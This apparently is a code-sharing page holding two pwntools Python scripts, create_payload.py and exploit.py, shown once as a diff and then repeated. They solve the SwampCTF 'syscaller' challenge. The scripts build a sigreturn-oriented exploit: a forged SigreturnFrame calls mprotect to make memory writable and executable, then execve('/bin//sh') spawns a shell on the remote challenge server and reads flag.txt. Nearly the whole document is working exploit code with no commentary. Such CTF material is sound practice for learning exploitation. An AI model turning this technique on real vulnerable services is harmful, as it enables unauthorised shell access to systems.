wideglide · April 1, 2018 04:15
diff --git a/create_payload.py b/create_payload.py
 from pwn import *
 import sys
 from struct import pack

 # challenge specific
 FILE = './syscaller'
 SVR = 'chal1.swampctf.com'
 PORT = 1800

 # set up environ
 level=  ['debug','info','error'][1]
 context(arch='amd64',os='linux',log_level=level)
 context.terminal = ["terminator", "-e"]
 # context.terminal = ['tmux', 'splitw', '-h']


 # R12,R11,RDI,RAX,RBX,RDX,RSI,RDI
 RAX = 0xf           #  sigaction
 initial_stack = pack("<QQQQQQQQ",0,0,0,RAX,0,0,0,0)

 sys.stdout.write(initial_stack)

 # send sigaction stack frame ( RIP = 0x400104, mprotect)
 f = SigreturnFrame()
 f.rax = 0xa         # rax = mprotect syscall
 f.rdi = 0x400000    # start
 f.rsi = 0x2000      # len
 f.rdx = 7           # rwx
 f.rip = 0x400104    # program counter
 f.rsp = 0x400400    # new stack location

 sys.stdout.write(str(f))
 sys.stdout.write("A" * (512 - (len(str(f))+8*8)))

 # send execve("/bin//sh",["/bin//sh",0],0)
 # R12,R11,RDI,RAX,RBX,RDX,RSI,RDI
 RAX = 59           # execve
 RDX = 0            # NULL
 RSI = 0x400440     # rsi => ["/bin//sh",0]
 RDI = 0x400450     # rdi => "/bin//sh"
 sys.stdout.write( pack("<QQQQQQQQ",0,0,0,RAX,0,RDX,RSI,RDI) )
 sys.stdout.write( pack("<QQ",0x400450,0) )
 sys.stdout.write("/bin//sh")
 sys.stdout.write( pack("<Q",0))
diff --git a/exploit.py b/exploit.py
 from pwn import *
 import argparse
 from struct import pack

 # challenge specific
 FILE = './syscaller'
 SVR = 'chal1.swampctf.com'
 PORT = 1800

 # set up environ
 parser = argparse.ArgumentParser()
 parser.add_argument('-r', dest='remote', action='store_true',default=False,help='run remotely')
 parser.add_argument('-d', dest='debug', action='store_true',default=False,help='debug in GDB')
 args = parser.parse_args()
 level=  ['debug','info','error'][1]
 context(arch='amd64',os='linux',log_level=level)
 context.terminal = ["terminator", "-e"]
 # context.terminal = ['tmux', 'splitw', '-h']

 if args.remote:
  r = remote(SVR, PORT)
 else:
  r = process(FILE)

 if args.debug and not args.remote:
  gdb.attach(r)

 # R12,R11,RDI,RAX,RBX,RDX,RSI,RDI
 RAX = 0xf           #  sigaction
 r.send( pack("<QQQQQQQQ",0,0,0,RAX,0,0,0,0) )

 # send sigaction stack frame ( RIP = 0x400104, mprotect)
 f = SigreturnFrame()
 f.rax = 0xa         # rax = mprotect syscall
 f.rdi = 0x400000    # start
 f.rsi = 0x2000      # len
 f.rdx = 7           # rwx
 f.rip = 0x400104    # program counter
 f.rsp = 0x400400    # new stack location

 r.send(str(f))
 r.send("A" * (512 - (len(str(f))+8*8)))
 print r.recv()

 # send execve("/bin//sh",["/bin//sh",0],0)
 # R12,R11,RDI,RAX,RBX,RDX,RSI,RDI
 RAX = 59           # execve
 RDX = 0            # NULL
 RSI = 0x400440     # rsi => ["/bin//sh",0]
 RDI = 0x400450     # rdi => "/bin//sh"
 r.send( pack("<QQQQQQQQ",0,0,0,RAX,0,RDX,RSI,RDI) )
 r.send( pack("<QQ",0x400450,0) )
 r.send("/bin//sh")
 r.send( pack("<Q",0))
 r.send('\n')

 r.send("cat flag.txt\n")
 print r.recv()
	from pwn import *
	import sys
	from struct import pack

	# challenge specific
	FILE = './syscaller'
	SVR = 'chal1.swampctf.com'
	PORT = 1800

	# set up environ
	level= ['debug','info','error'][1]
	context(arch='amd64',os='linux',log_level=level)
	context.terminal = ["terminator", "-e"]
	# context.terminal = ['tmux', 'splitw', '-h']


	# R12,R11,RDI,RAX,RBX,RDX,RSI,RDI
	RAX = 0xf # sigaction
	initial_stack = pack("<QQQQQQQQ",0,0,0,RAX,0,0,0,0)

	sys.stdout.write(initial_stack)

	# send sigaction stack frame ( RIP = 0x400104, mprotect)
	f = SigreturnFrame()
	f.rax = 0xa # rax = mprotect syscall
	f.rdi = 0x400000 # start
	f.rsi = 0x2000 # len
	f.rdx = 7 # rwx
	f.rip = 0x400104 # program counter
	f.rsp = 0x400400 # new stack location

	sys.stdout.write(str(f))
	sys.stdout.write("A" * (512 - (len(str(f))+8*8)))

	# send execve("/bin//sh",["/bin//sh",0],0)
	# R12,R11,RDI,RAX,RBX,RDX,RSI,RDI
	RAX = 59 # execve
	RDX = 0 # NULL
	RSI = 0x400440 # rsi => ["/bin//sh",0]
	RDI = 0x400450 # rdi => "/bin//sh"
	sys.stdout.write( pack("<QQQQQQQQ",0,0,0,RAX,0,RDX,RSI,RDI) )
	sys.stdout.write( pack("<QQ",0x400450,0) )
	sys.stdout.write("/bin//sh")
	sys.stdout.write( pack("<Q",0))
	from pwn import *
	import argparse
	from struct import pack

	# challenge specific
	FILE = './syscaller'
	SVR = 'chal1.swampctf.com'
	PORT = 1800

	# set up environ
	parser = argparse.ArgumentParser()
	parser.add_argument('-r', dest='remote', action='store_true',default=False,help='run remotely')
	parser.add_argument('-d', dest='debug', action='store_true',default=False,help='debug in GDB')
	args = parser.parse_args()
	level= ['debug','info','error'][1]
	context(arch='amd64',os='linux',log_level=level)
	context.terminal = ["terminator", "-e"]
	# context.terminal = ['tmux', 'splitw', '-h']

	if args.remote:
	r = remote(SVR, PORT)
	else:
	r = process(FILE)

	if args.debug and not args.remote:
	gdb.attach(r)

	# R12,R11,RDI,RAX,RBX,RDX,RSI,RDI
	RAX = 0xf # sigaction
	r.send( pack("<QQQQQQQQ",0,0,0,RAX,0,0,0,0) )

	# send sigaction stack frame ( RIP = 0x400104, mprotect)
	f = SigreturnFrame()
	f.rax = 0xa # rax = mprotect syscall
	f.rdi = 0x400000 # start
	f.rsi = 0x2000 # len
	f.rdx = 7 # rwx
	f.rip = 0x400104 # program counter
	f.rsp = 0x400400 # new stack location

	r.send(str(f))
	r.send("A" * (512 - (len(str(f))+8*8)))
	print r.recv()

	# send execve("/bin//sh",["/bin//sh",0],0)
	# R12,R11,RDI,RAX,RBX,RDX,RSI,RDI
	RAX = 59 # execve
	RDX = 0 # NULL
	RSI = 0x400440 # rsi => ["/bin//sh",0]
	RDI = 0x400450 # rdi => "/bin//sh"
	r.send( pack("<QQQQQQQQ",0,0,0,RAX,0,RDX,RSI,RDI) )
	r.send( pack("<QQ",0x400450,0) )
	r.send("/bin//sh")
	r.send( pack("<Q",0))
	r.send('\n')

	r.send("cat flag.txt\n")
	print r.recv()